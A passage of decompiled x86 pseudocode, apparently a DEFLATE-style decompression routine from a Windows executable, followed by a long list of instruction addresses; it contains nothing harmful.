                                                                                                														__ecx =  &(__esi[0x6e8]);
                                                                                                														 *(__ebp - 0x20) =  &(__esi[0x6e8]);
                                                                                                													}
                                                                                                													_t357 =  &(__esi[1]);
                                                                                                													 *_t357 = __esi[1] - 1;
                                                                                                													__eflags =  *_t357;
                                                                                                												} while ( *_t357 != 0);
                                                                                                											}
                                                                                                											goto L23;
                                                                                                										case 6:
                                                                                                											L156:
                                                                                                											__eax =  *(__ebp - 0x2c);
                                                                                                											__edi =  *(__ebp - 0x30);
                                                                                                											__eflags = __eax;
                                                                                                											if(__eax != 0) {
                                                                                                												L172:
                                                                                                												__cl = __esi[2];
                                                                                                												 *__edi = __cl;
                                                                                                												__edi = __edi + 1;
                                                                                                												__eax = __eax - 1;
                                                                                                												 *(__ebp - 0x30) = __edi;
                                                                                                												 *(__ebp - 0x2c) = __eax;
                                                                                                												goto L23;
                                                                                                											}
                                                                                                											L157:
                                                                                                											__ecx = __esi[0x26e8];
                                                                                                											__eflags = __edi - __ecx;
                                                                                                											if(__edi != __ecx) {
                                                                                                												L163:
                                                                                                												__esi[0x26ea] = __edi;
                                                                                                												__eax = E004067B2( *((intOrPtr*)(__ebp + 8)));
                                                                                                												__edi = __esi[0x26ea];
                                                                                                												__ecx = __esi[0x26e9];
                                                                                                												__eflags = __edi - __ecx;
                                                                                                												 *(__ebp - 0x30) = __edi;
                                                                                                												if(__edi >= __ecx) {
                                                                                                													__eax = __esi[0x26e8];
                                                                                                													__eax = __esi[0x26e8] - __edi;
                                                                                                													__eflags = __eax;
                                                                                                												} else {
                                                                                                													__ecx = __ecx - __edi;
                                                                                                													__eax = __ecx - __edi - 1;
                                                                                                												}
                                                                                                												__edx = __esi[0x26e8];
                                                                                                												__eflags = __edi - __edx;
                                                                                                												 *(__ebp - 8) = __edx;
                                                                                                												if(__edi == __edx) {
                                                                                                													__edx =  &(__esi[0x6e8]);
                                                                                                													__eflags = __ecx - __edx;
                                                                                                													if(__ecx != __edx) {
                                                                                                														__edi = __edx;
                                                                                                														__eflags = __edi - __ecx;
                                                                                                														 *(__ebp - 0x30) = __edi;
                                                                                                														if(__edi >= __ecx) {
                                                                                                															__eax =  *(__ebp - 8);
                                                                                                															__eax =  *(__ebp - 8) - __edi;
                                                                                                															__eflags = __eax;
                                                                                                														} else {
                                                                                                															__ecx = __ecx - __edi;
                                                                                                															__eax = __ecx;
                                                                                                														}
                                                                                                													}
                                                                                                												}
                                                                                                												__eflags = __eax;
                                                                                                												if(__eax == 0) {
                                                                                                													goto L183;
                                                                                                												} else {
                                                                                                													goto L172;
                                                                                                												}
                                                                                                											}
                                                                                                											L158:
                                                                                                											__eax = __esi[0x26e9];
                                                                                                											__edx =  &(__esi[0x6e8]);
                                                                                                											__eflags = __eax - __edx;
                                                                                                											if(__eax == __edx) {
                                                                                                												goto L163;
                                                                                                											}
                                                                                                											L159:
                                                                                                											__edi = __edx;
                                                                                                											__eflags = __edi - __eax;
                                                                                                											if(__edi >= __eax) {
                                                                                                												__ecx = __ecx - __edi;
                                                                                                												__eflags = __ecx;
                                                                                                												__eax = __ecx;
                                                                                                											} else {
                                                                                                												__eax = __eax - __edi;
                                                                                                												__eax = __eax - 1;
                                                                                                											}
                                                                                                											__eflags = __eax;
                                                                                                											if(__eax != 0) {
                                                                                                												goto L172;
                                                                                                											} else {
                                                                                                												goto L163;
                                                                                                											}
                                                                                                										case 7:
                                                                                                											L173:
                                                                                                											__eflags = __ebx - 7;
                                                                                                											if(__ebx > 7) {
                                                                                                												__ebx = __ebx - 8;
                                                                                                												 *(__ebp - 0x34) =  *(__ebp - 0x34) + 1;
                                                                                                												_t380 = __ebp - 0x38;
                                                                                                												 *_t380 =  *(__ebp - 0x38) - 1;
                                                                                                												__eflags =  *_t380;
                                                                                                											}
                                                                                                											goto L175;
                                                                                                										case 8:
                                                                                                											L4:
                                                                                                											while(_t425 < 3) {
                                                                                                												if( *(_t448 - 0x34) == 0) {
                                                                                                													goto L182;
                                                                                                												} else {
                                                                                                													 *(_t448 - 0x34) =  *(_t448 - 0x34) - 1;
                                                                                                													 *(_t448 - 0x40) =  *(_t448 - 0x40) | ( *( *(_t448 - 0x38)) & 0x000000ff) << _t425;
                                                                                                													 *(_t448 - 0x38) =  &(( *(_t448 - 0x38))[1]);
                                                                                                													_t425 = _t425 + 8;
                                                                                                													continue;
                                                                                                												}
                                                                                                											}
                                                                                                											_t425 = _t425 - 3;
                                                                                                											 *(_t448 - 0x40) =  *(_t448 - 0x40) >> 3;
                                                                                                											_t406 =  *(_t448 - 0x40) & 0x00000007;
                                                                                                											asm("sbb ecx, ecx");
                                                                                                											_t408 = _t406 >> 1;
                                                                                                											_t446[0x145] = ( ~(_t406 & 0x00000001) & 0x00000007) + 8;
                                                                                                											if(_t408 == 0) {
                                                                                                												L24:
                                                                                                												 *_t446 = 9;
                                                                                                												_t436 = _t425 & 0x00000007;
                                                                                                												 *(_t448 - 0x40) =  *(_t448 - 0x40) >> _t436;
                                                                                                												_t425 = _t425 - _t436;
                                                                                                												goto L180;
                                                                                                											}
                                                                                                											L6:
                                                                                                											_t411 = _t408 - 1;
                                                                                                											if(_t411 == 0) {
                                                                                                												L13:
                                                                                                												__eflags =  *0x42daf0;
                                                                                                												if( *0x42daf0 != 0) {
                                                                                                													L22:
                                                                                                													_t412 =  *0x409364; // 0x9
                                                                                                													_t446[4] = _t412;
                                                                                                													_t413 =  *0x409368; // 0x5
                                                                                                													_t446[4] = _t413;
                                                                                                													_t414 =  *0x42c96c; // 0x0
                                                                                                													_t446[5] = _t414;
                                                                                                													_t415 =  *0x42c968; // 0x0
                                                                                                													_t446[6] = _t415;
                                                                                                													L23:
                                                                                                													 *_t446 =  *_t446 & 0x00000000;
                                                                                                													goto L180;
                                                                                                												} else {
                                                                                                													_t26 = _t448 - 8;
                                                                                                													 *_t26 =  *(_t448 - 8) & 0x00000000;
                                                                                                													__eflags =  *_t26;
                                                                                                													_t416 = 0x42c970;
                                                                                                													goto L15;
                                                                                                													L20:
                                                                                                													 *_t416 = _t438;
                                                                                                													_t416 = _t416 + 4;
                                                                                                													__eflags = _t416 - 0x42cdf0;
                                                                                                													if(_t416 < 0x42cdf0) {
                                                                                                														L15:
                                                                                                														__eflags = _t416 - 0x42cbac;
                                                                                                														_t438 = 8;
                                                                                                														if(_t416 > 0x42cbac) {
                                                                                                															__eflags = _t416 - 0x42cd70;
                                                                                                															if(_t416 >= 0x42cd70) {
                                                                                                																__eflags = _t416 - 0x42cdd0;
                                                                                                																if(_t416 < 0x42cdd0) {
                                                                                                																	_t438 = 7;
                                                                                                																}
                                                                                                															} else {
                                                                                                																_t438 = 9;
                                                                                                															}
                                                                                                														}
                                                                                                														goto L20;
                                                                                                													} else {
                                                                                                														E0040681A(0x42c970, 0x120, 0x101, 0x407388, 0x4073c8, 0x42c96c, 0x409364, 0x42d270, _t448 - 8);
                                                                                                														_push(0x1e);
                                                                                                														_pop(_t440);
                                                                                                														_push(5);
                                                                                                														_pop(_t419);
                                                                                                														memset(0x42c970, _t419, _t440 << 2);
                                                                                                														_t450 = _t450 + 0xc;
                                                                                                														_t442 = 0x42c970 + _t440;
                                                                                                														E0040681A(0x42c970, 0x1e, 0, 0x407408, 0x407444, 0x42c968, 0x409368, 0x42d270, _t448 - 8);
                                                                                                														 *0x42daf0 =  *0x42daf0 + 1;
                                                                                                														__eflags =  *0x42daf0;
                                                                                                														goto L22;
                                                                                                													}
                                                                                                												}
                                                                                                											}
                                                                                                											L7:
                                                                                                											_t423 = _t411 - 1;
                                                                                                											if(_t423 == 0) {
                                                                                                												 *_t446 = 0xb;
                                                                                                												goto L180;
                                                                                                											}
                                                                                                											L8:
                                                                                                											if(_t423 != 1) {
                                                                                                												goto L180;
                                                                                                											}
                                                                                                											goto L9;
                                                                                                										case 9:
                                                                                                											while(1) {
                                                                                                												L27:
                                                                                                												__eflags = __ebx - 0x10;
                                                                                                												if(__ebx >= 0x10) {
                                                                                                													break;
                                                                                                												}
                                                                                                												L25:
                                                                                                												__eflags =  *(__ebp - 0x34);
                                                                                                												if( *(__ebp - 0x34) == 0) {
                                                                                                													goto L182;
                                                                                                												}
                                                                                                												L26:
                                                                                                												__eax =  *(__ebp - 0x38);
                                                                                                												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                                                                                												__ecx = __ebx;
                                                                                                												 *( *(__ebp - 0x38)) & 0x000000ff = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                                                												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                                                												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                                                                                												__ebx = __ebx + 8;
                                                                                                												__eflags = __ebx;
                                                                                                											}
                                                                                                											L28:
                                                                                                											__eax =  *(__ebp - 0x40);
                                                                                                											__ebx = 0;
                                                                                                											__eax =  *(__ebp - 0x40) & 0x0000ffff;
                                                                                                											 *(__ebp - 0x40) = 0;
                                                                                                											__eflags = __eax;
                                                                                                											__esi[1] = __eax;
                                                                                                											if(__eax == 0) {
                                                                                                												goto L53;
                                                                                                											}
                                                                                                											L29:
                                                                                                											_push(0xa);
                                                                                                											_pop(__eax);
                                                                                                											goto L54;
                                                                                                										case 0xa:
                                                                                                											L30:
                                                                                                											__eflags =  *(__ebp - 0x34);
                                                                                                											if( *(__ebp - 0x34) == 0) {
                                                                                                												goto L182;
                                                                                                											}
                                                                                                											L31:
                                                                                                											__eax =  *(__ebp - 0x2c);
                                                                                                											__eflags = __eax;
                                                                                                											if(__eax != 0) {
                                                                                                												L48:
                                                                                                												__eflags = __eax -  *(__ebp - 0x34);
                                                                                                												if(__eax >=  *(__ebp - 0x34)) {
                                                                                                													__eax =  *(__ebp - 0x34);
                                                                                                												}
                                                                                                												__ecx = __esi[1];
                                                                                                												__eflags = __ecx - __eax;
                                                                                                												__edi = __ecx;
                                                                                                												if(__ecx >= __eax) {
                                                                                                													__edi = __eax;
                                                                                                												}
                                                                                                												__eax = E004055C3( *(__ebp - 0x30),  *(__ebp - 0x38), __edi);
                                                                                                												 *(__ebp - 0x38) =  *(__ebp - 0x38) + __edi;
                                                                                                												 *(__ebp - 0x34) =  *(__ebp - 0x34) - __edi;
                                                                                                												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __edi;
                                                                                                												 *(__ebp - 0x2c) =  *(__ebp - 0x2c) - __edi;
                                                                                                												_t80 =  &(__esi[1]);
                                                                                                												 *_t80 = __esi[1] - __edi;
                                                                                                												__eflags =  *_t80;
                                                                                                												if( *_t80 == 0) {
                                                                                                													L53:
                                                                                                													__eax = __esi[0x145];
                                                                                                													L54:
                                                                                                													 *__esi = __eax;
                                                                                                												}
                                                                                                												goto L180;
                                                                                                											}
                                                                                                											L32:
                                                                                                											__ecx = __esi[0x26e8];
                                                                                                											__edx =  *(__ebp - 0x30);
                                                                                                											__eflags = __edx - __ecx;
                                                                                                											if(__edx != __ecx) {
                                                                                                												L38:
                                                                                                												__esi[0x26ea] = __edx;
                                                                                                												__eax = E004067B2( *((intOrPtr*)(__ebp + 8)));
                                                                                                												__edx = __esi[0x26ea];
                                                                                                												__ecx = __esi[0x26e9];
                                                                                                												__eflags = __edx - __ecx;
                                                                                                												 *(__ebp - 0x30) = __edx;
                                                                                                												if(__edx >= __ecx) {
                                                                                                													__eax = __esi[0x26e8];
                                                                                                													__eax = __esi[0x26e8] - __edx;
                                                                                                													__eflags = __eax;
                                                                                                												} else {
                                                                                                													__ecx = __ecx - __edx;
                                                                                                													__eax = __ecx - __edx - 1;
                                                                                                												}
                                                                                                												__edi = __esi[0x26e8];
                                                                                                												 *(__ebp - 0x2c) = __eax;
                                                                                                												__eflags = __edx - __edi;
                                                                                                												if(__edx == __edi) {
                                                                                                													__edx =  &(__esi[0x6e8]);
                                                                                                													__eflags = __edx - __ecx;
                                                                                                													if(__eflags != 0) {
                                                                                                														 *(__ebp - 0x30) = __edx;
                                                                                                														if(__eflags >= 0) {
                                                                                                															__edi = __edi - __edx;
                                                                                                															__eflags = __edi;
                                                                                                															__eax = __edi;
                                                                                                														} else {
                                                                                                															__ecx = __ecx - __edx;
                                                                                                															__eax = __ecx;
                                                                                                														}
                                                                                                														 *(__ebp - 0x2c) = __eax;
                                                                                                													}
                                                                                                												}
                                                                                                												__eflags = __eax;
                                                                                                												if(__eax == 0) {
                                                                                                													goto L183;
                                                                                                												} else {
                                                                                                													goto L48;
                                                                                                												}
                                                                                                											}
                                                                                                											L33:
                                                                                                											__eax = __esi[0x26e9];
                                                                                                											__edi =  &(__esi[0x6e8]);
                                                                                                											__eflags = __eax - __edi;
                                                                                                											if(__eax == __edi) {
                                                                                                												goto L38;
                                                                                                											}
                                                                                                											L34:
                                                                                                											__edx = __edi;
                                                                                                											__eflags = __edx - __eax;
                                                                                                											 *(__ebp - 0x30) = __edx;
                                                                                                											if(__edx >= __eax) {
                                                                                                												__ecx = __ecx - __edx;
                                                                                                												__eflags = __ecx;
                                                                                                												__eax = __ecx;
                                                                                                											} else {
                                                                                                												__eax = __eax - __edx;
                                                                                                												__eax = __eax - 1;
                                                                                                											}
                                                                                                											__eflags = __eax;
                                                                                                											 *(__ebp - 0x2c) = __eax;
                                                                                                											if(__eax != 0) {
                                                                                                												goto L48;
                                                                                                											} else {
                                                                                                												goto L38;
                                                                                                											}
                                                                                                										case 0xb:
                                                                                                											goto L56;
                                                                                                										case 0xc:
                                                                                                											L60:
                                                                                                											__esi[1] = __esi[1] >> 0xa;
                                                                                                											__eax = (__esi[1] >> 0xa) + 4;
                                                                                                											if(__esi[2] >= (__esi[1] >> 0xa) + 4) {
                                                                                                												goto L68;
                                                                                                											}
                                                                                                											goto L61;
                                                                                                										case 0xd:
                                                                                                											while(1) {
                                                                                                												L93:
                                                                                                												__eax = __esi[1];
                                                                                                												__ecx = __esi[2];
                                                                                                												__edx = __eax;
                                                                                                												__eax = __eax & 0x0000001f;
                                                                                                												__edx = __edx >> 5;
                                                                                                												__eax = __edx + __eax + 0x102;
                                                                                                												__eflags = __esi[2] - __eax;
                                                                                                												if(__esi[2] >= __eax) {
                                                                                                													break;
                                                                                                												}
                                                                                                												L73:
                                                                                                												__eax = __esi[0x143];
                                                                                                												while(1) {
                                                                                                													L76:
                                                                                                													__eflags = __ebx - __eax;
                                                                                                													if(__ebx >= __eax) {
                                                                                                														break;
                                                                                                													}
                                                                                                													L74:
                                                                                                													__eflags =  *(__ebp - 0x34);
                                                                                                													if( *(__ebp - 0x34) == 0) {
                                                                                                														goto L182;
                                                                                                													}
                                                                                                													L75:
                                                                                                													__ecx =  *(__ebp - 0x38);
                                                                                                													 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                                                                                													__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
                                                                                                													__ecx = __ebx;
                                                                                                													__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                                                													 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                                                													 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                                                                                													__ebx = __ebx + 8;
                                                                                                													__eflags = __ebx;
                                                                                                												}
                                                                                                												L77:
                                                                                                												__eax =  *(0x409340 + __eax * 2) & 0x0000ffff;
                                                                                                												__eax = __eax &  *(__ebp - 0x40);
                                                                                                												__ecx = __esi[0x144];
                                                                                                												__eax = __esi[0x144] + __eax * 4;
                                                                                                												__edx =  *(__eax + 1) & 0x000000ff;
                                                                                                												__eax =  *(__eax + 2) & 0x0000ffff;
                                                                                                												__eflags = __eax - 0x10;
                                                                                                												 *(__ebp - 0x14) = __eax;
                                                                                                												if(__eax >= 0x10) {
                                                                                                													L79:
                                                                                                													__eflags = __eax - 0x12;
                                                                                                													if(__eax != 0x12) {
                                                                                                														__eax = __eax + 0xfffffff2;
                                                                                                														 *(__ebp - 8) = 3;
                                                                                                													} else {
                                                                                                														_push(7);
                                                                                                														 *(__ebp - 8) = 0xb;
                                                                                                														_pop(__eax);
                                                                                                													}
                                                                                                													while(1) {
                                                                                                														L84:
                                                                                                														__ecx = __eax + __edx;
                                                                                                														__eflags = __ebx - __eax + __edx;
                                                                                                														if(__ebx >= __eax + __edx) {
                                                                                                															break;
                                                                                                														}
                                                                                                														L82:
                                                                                                														__eflags =  *(__ebp - 0x34);
                                                                                                														if( *(__ebp - 0x34) == 0) {
                                                                                                															goto L182;
                                                                                                														}
                                                                                                														L83:
                                                                                                														__ecx =  *(__ebp - 0x38);
                                                                                                														 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                                                                                														__edi =  *( *(__ebp - 0x38)) & 0x000000ff;
                                                                                                														__ecx = __ebx;
                                                                                                														__edi = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                                                														 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                                                														 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                                                                                														__ebx = __ebx + 8;
                                                                                                														__eflags = __ebx;
                                                                                                													}
                                                                                                													L85:
                                                                                                													__ecx = __edx;
                                                                                                													__ebx = __ebx - __edx;
                                                                                                													 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
                                                                                                													 *(0x409340 + __eax * 2) & 0x0000ffff =  *(0x409340 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40);
                                                                                                													__edx =  *(__ebp - 8);
                                                                                                													__ebx = __ebx - __eax;
                                                                                                													__edx =  *(__ebp - 8) + ( *(0x409340 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40));
                                                                                                													__ecx = __eax;
                                                                                                													__eax = __esi[1];
                                                                                                													 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
                                                                                                													__ecx = __esi[2];
                                                                                                													__eax = __eax >> 5;
                                                                                                													__edi = __eax >> 0x00000005 & 0x0000001f;
                                                                                                													__eax = __eax & 0x0000001f;
                                                                                                													__eax = __edi + __eax + 0x102;
                                                                                                													__edi = __edx + __ecx;
                                                                                                													__eflags = __edx + __ecx - __eax;
                                                                                                													if(__edx + __ecx > __eax) {
                                                                                                														goto L9;
                                                                                                													}
                                                                                                													L86:
                                                                                                													__eflags =  *(__ebp - 0x14) - 0x10;
                                                                                                													if( *(__ebp - 0x14) != 0x10) {
                                                                                                														L89:
                                                                                                														__edi = 0;
                                                                                                														__eflags = 0;
                                                                                                														L90:
                                                                                                														__eax = __esi + 0xc + __ecx * 4;
                                                                                                														do {
                                                                                                															L91:
                                                                                                															 *__eax = __edi;
                                                                                                															__ecx = __ecx + 1;
                                                                                                															__eax = __eax + 4;
                                                                                                															__edx = __edx - 1;
                                                                                                															__eflags = __edx;
                                                                                                														} while (__edx != 0);
                                                                                                														__esi[2] = __ecx;
                                                                                                														continue;
                                                                                                													}
                                                                                                													L87:
                                                                                                													__eflags = __ecx - 1;
                                                                                                													if(__ecx < 1) {
                                                                                                														goto L9;
                                                                                                													}
                                                                                                													L88:
                                                                                                													__edi =  *(__esi + 8 + __ecx * 4);
                                                                                                													goto L90;
                                                                                                												}
                                                                                                												L78:
                                                                                                												__ecx = __edx;
                                                                                                												__ebx = __ebx - __edx;
                                                                                                												 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
                                                                                                												__ecx = __esi[2];
                                                                                                												 *(__esi + 0xc + __esi[2] * 4) = __eax;
                                                                                                												__esi[2] = __esi[2] + 1;
                                                                                                											}
                                                                                                											L94:
                                                                                                											__eax = __esi[1];
                                                                                                											__esi[0x144] = __esi[0x144] & 0x00000000;
                                                                                                											 *(__ebp - 0xc) =  *(__ebp - 0xc) & 0x00000000;
                                                                                                											__edi = __eax;
                                                                                                											__eax = __eax >> 5;
                                                                                                											__edi = __edi & 0x0000001f;
                                                                                                											__ecx = 0x101;
                                                                                                											__eax = __eax & 0x0000001f;
                                                                                                											__edi = __edi + 0x101;
                                                                                                											__eax = __eax + 1;
                                                                                                											__edx = __ebp - 0xc;
                                                                                                											 *(__ebp - 0x14) = __eax;
                                                                                                											 &(__esi[0x148]) = __ebp - 4;
                                                                                                											 *(__ebp - 4) = 9;
                                                                                                											__ebp - 0x18 =  &(__esi[3]);
                                                                                                											 *(__ebp - 0x10) = 6;
                                                                                                											__eax = E0040681A( &(__esi[3]), __edi, 0x101, 0x407388, 0x4073c8, __ebp - 0x18, __ebp - 4,  &(__esi[0x148]), __ebp - 0xc);
                                                                                                											__eflags =  *(__ebp - 4);
                                                                                                											if( *(__ebp - 4) == 0) {
                                                                                                												__eax = __eax | 0xffffffff;
                                                                                                												__eflags = __eax;
                                                                                                											}
                                                                                                											__eflags = __eax;
                                                                                                											if(__eax != 0) {
                                                                                                												goto L9;
                                                                                                											} else {
                                                                                                												L97:
                                                                                                												__ebp - 0xc =  &(__esi[0x148]);
                                                                                                												__ebp - 0x10 = __ebp - 0x1c;
                                                                                                												__eax = __esi + 0xc + __edi * 4;
                                                                                                												__eax = E0040681A(__esi + 0xc + __edi * 4,  *(__ebp - 0x14), 0, 0x407408, 0x407444, __ebp - 0x1c, __ebp - 0x10,  &(__esi[0x148]), __ebp - 0xc);
                                                                                                												__eflags = __eax;
                                                                                                												if(__eax != 0) {
                                                                                                													goto L9;
                                                                                                												}
                                                                                                												L98:
                                                                                                												__eax =  *(__ebp - 0x10);
                                                                                                												__eflags =  *(__ebp - 0x10);
                                                                                                												if( *(__ebp - 0x10) != 0) {
                                                                                                													L100:
                                                                                                													__cl =  *(__ebp - 4);
                                                                                                													 *__esi =  *__esi & 0x00000000;
                                                                                                													__eflags =  *__esi;
                                                                                                													__esi[4] = __al;
                                                                                                													__eax =  *(__ebp - 0x18);
                                                                                                													__esi[5] =  *(__ebp - 0x18);
                                                                                                													__eax =  *(__ebp - 0x1c);
                                                                                                													__esi[4] = __cl;
                                                                                                													__esi[6] =  *(__ebp - 0x1c);
                                                                                                													goto L101;
                                                                                                												}
                                                                                                												L99:
                                                                                                												__eflags = __edi - 0x101;
                                                                                                												if(__edi > 0x101) {
                                                                                                													goto L9;
                                                                                                												}
                                                                                                												goto L100;
                                                                                                											}
                                                                                                										case 0xe:
                                                                                                											goto L9;
                                                                                                										case 0xf:
                                                                                                											L175:
                                                                                                											__eax =  *(__ebp - 0x30);
                                                                                                											__esi[0x26ea] =  *(__ebp - 0x30);
                                                                                                											__eax = E004067B2( *((intOrPtr*)(__ebp + 8)));
                                                                                                											__ecx = __esi[0x26ea];
                                                                                                											__edx = __esi[0x26e9];
                                                                                                											__eflags = __ecx - __edx;
                                                                                                											 *(__ebp - 0x30) = __ecx;
                                                                                                											if(__ecx >= __edx) {
                                                                                                												__eax = __esi[0x26e8];
                                                                                                												__eax = __esi[0x26e8] - __ecx;
                                                                                                												__eflags = __eax;
                                                                                                											} else {
                                                                                                												__edx = __edx - __ecx;
                                                                                                												__eax = __edx - __ecx - 1;
                                                                                                											}
                                                                                                											__eflags = __ecx - __edx;
                                                                                                											 *(__ebp - 0x2c) = __eax;
                                                                                                											if(__ecx != __edx) {
                                                                                                												L183:
                                                                                                												__edi = 0;
                                                                                                												goto L10;
                                                                                                											} else {
                                                                                                												L179:
                                                                                                												__eax = __esi[0x145];
                                                                                                												__eflags = __eax - 8;
                                                                                                												 *__esi = __eax;
                                                                                                												if(__eax != 8) {
                                                                                                													L184:
                                                                                                													0 = 1;
                                                                                                													goto L10;
                                                                                                												}
                                                                                                												goto L180;
                                                                                                											}
                                                                                                									}
                                                                                                								}
                                                                                                								L181:
                                                                                                								goto L9;
                                                                                                							}
                                                                                                							L70:
                                                                                                							if( *__edi == __eax) {
                                                                                                								goto L72;
                                                                                                							}
                                                                                                							L71:
                                                                                                							__esi[2] = __esi[2] & __eax;
                                                                                                							 *__esi = 0xd;
                                                                                                							goto L93;
                                                                                                						}
                                                                                                					}
                                                                                                				}
                                                                                                				L182:
                                                                                                				_t443 = 0;
                                                                                                				_t446[0x147] =  *(_t448 - 0x40);
                                                                                                				_t446[0x146] = _t425;
                                                                                                				( *(_t448 + 8))[1] = 0;
                                                                                                				goto L11;
                                                                                                			}









                                                                                                0x004063fb
                                                                                                0x004063fb
                                                                                                0x004063fe
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00406404
                                                                                                0x00406404
                                                                                                0x00406407
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x0040640d
                                                                                                0x0040640d
                                                                                                0x00000000
                                                                                                0x0040640d
                                                                                                0x004063e3
                                                                                                0x004063e6
                                                                                                0x004063ed
                                                                                                0x004063f0
                                                                                                0x00000000
                                                                                                0x004063f0
                                                                                                0x004063cc
                                                                                                0x004063d0
                                                                                                0x004063d3
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00406418
                                                                                                0x00406418
                                                                                                0x0040643d
                                                                                                0x0040643d
                                                                                                0x0040643d
                                                                                                0x0040643f
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x0040641d
                                                                                                0x0040641d
                                                                                                0x00406421
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00406427
                                                                                                0x00406427
                                                                                                0x0040642a
                                                                                                0x0040642d
                                                                                                0x00406430
                                                                                                0x00406432
                                                                                                0x00406434
                                                                                                0x00406437
                                                                                                0x0040643a
                                                                                                0x0040643a
                                                                                                0x0040643a
                                                                                                0x00406441
                                                                                                0x00406449
                                                                                                0x0040644c
                                                                                                0x0040644f
                                                                                                0x00406451
                                                                                                0x00406454
                                                                                                0x00406454
                                                                                                0x00406456
                                                                                                0x0040645a
                                                                                                0x0040645d
                                                                                                0x00406460
                                                                                                0x00406463
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00406469
                                                                                                0x00406469
                                                                                                0x0040648e
                                                                                                0x0040648e
                                                                                                0x0040648e
                                                                                                0x00406490
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x0040646e
                                                                                                0x0040646e
                                                                                                0x00406472
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00406478
                                                                                                0x00406478
                                                                                                0x0040647b
                                                                                                0x0040647e
                                                                                                0x00406481
                                                                                                0x00406483
                                                                                                0x00406485
                                                                                                0x00406488
                                                                                                0x0040648b
                                                                                                0x0040648b
                                                                                                0x0040648b
                                                                                                0x00406492
                                                                                                0x00406492
                                                                                                0x0040649a
                                                                                                0x0040649d
                                                                                                0x004064a0
                                                                                                0x004064a3
                                                                                                0x004064a7
                                                                                                0x004064aa
                                                                                                0x004064ac
                                                                                                0x004064af
                                                                                                0x004064b2
                                                                                                0x004064cc
                                                                                                0x004064cc
                                                                                                0x004064cf
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x004064d5
                                                                                                0x004064d5
                                                                                                0x004064d8
                                                                                                0x004064df
                                                                                                0x00000000
                                                                                                0x004064df
                                                                                                0x004064b4
                                                                                                0x004064b7
                                                                                                0x004064be
                                                                                                0x004064c1
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x004064e7
                                                                                                0x004064e7
                                                                                                0x0040650c
                                                                                                0x0040650c
                                                                                                0x0040650c
                                                                                                0x0040650e
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x004064ec
                                                                                                0x004064ec
                                                                                                0x004064f0
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x004064f6
                                                                                                0x004064f6
                                                                                                0x004064f9
                                                                                                0x004064fc
                                                                                                0x004064ff
                                                                                                0x00406501
                                                                                                0x00406503
                                                                                                0x00406506
                                                                                                0x00406509
                                                                                                0x00406509
                                                                                                0x00406509
                                                                                                0x00406510
                                                                                                0x00406518
                                                                                                0x0040651b
                                                                                                0x0040651e
                                                                                                0x00406520
                                                                                                0x00406523
                                                                                                0x00406523
                                                                                                0x00406525
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x0040652b
                                                                                                0x0040652b
                                                                                                0x0040652e
                                                                                                0x00406533
                                                                                                0x00406535
                                                                                                0x0040653b
                                                                                                0x0040653d
                                                                                                0x00406552
                                                                                                0x00406554
                                                                                                0x00406554
                                                                                                0x0040653f
                                                                                                0x00406545
                                                                                                0x00406547
                                                                                                0x00406549
                                                                                                0x00406549
                                                                                                0x00406556
                                                                                                0x0040655a
                                                                                                0x0040655d
                                                                                                0x00406563
                                                                                                0x00406563
                                                                                                0x00406566
                                                                                                0x00406566
                                                                                                0x00406566
                                                                                                0x00406568
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x0040656e
                                                                                                0x0040656e
                                                                                                0x00406574
                                                                                                0x00406576
                                                                                                0x0040659b
                                                                                                0x0040659e
                                                                                                0x004065a4
                                                                                                0x004065a9
                                                                                                0x004065af
                                                                                                0x004065b5
                                                                                                0x004065b7
                                                                                                0x004065ba
                                                                                                0x004065c3
                                                                                                0x004065c9
                                                                                                0x004065c9
                                                                                                0x004065bc
                                                                                                0x004065be
                                                                                                0x004065c0
                                                                                                0x004065c0
                                                                                                0x004065cb
                                                                                                0x004065d1
                                                                                                0x004065d3
                                                                                                0x004065d6
                                                                                                0x004065d8
                                                                                                0x004065de
                                                                                                0x004065e0
                                                                                                0x004065e2
                                                                                                0x004065e4
                                                                                                0x004065e6
                                                                                                0x004065e9
                                                                                                0x004065f2
                                                                                                0x004065f5
                                                                                                0x004065f5
                                                                                                0x004065eb
                                                                                                0x004065eb
                                                                                                0x004065ee
                                                                                                0x004065ee
                                                                                                0x004065e9
                                                                                                0x004065e0
                                                                                                0x004065f7
                                                                                                0x004065f9
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x004065f9
                                                                                                0x00406578
                                                                                                0x00406578
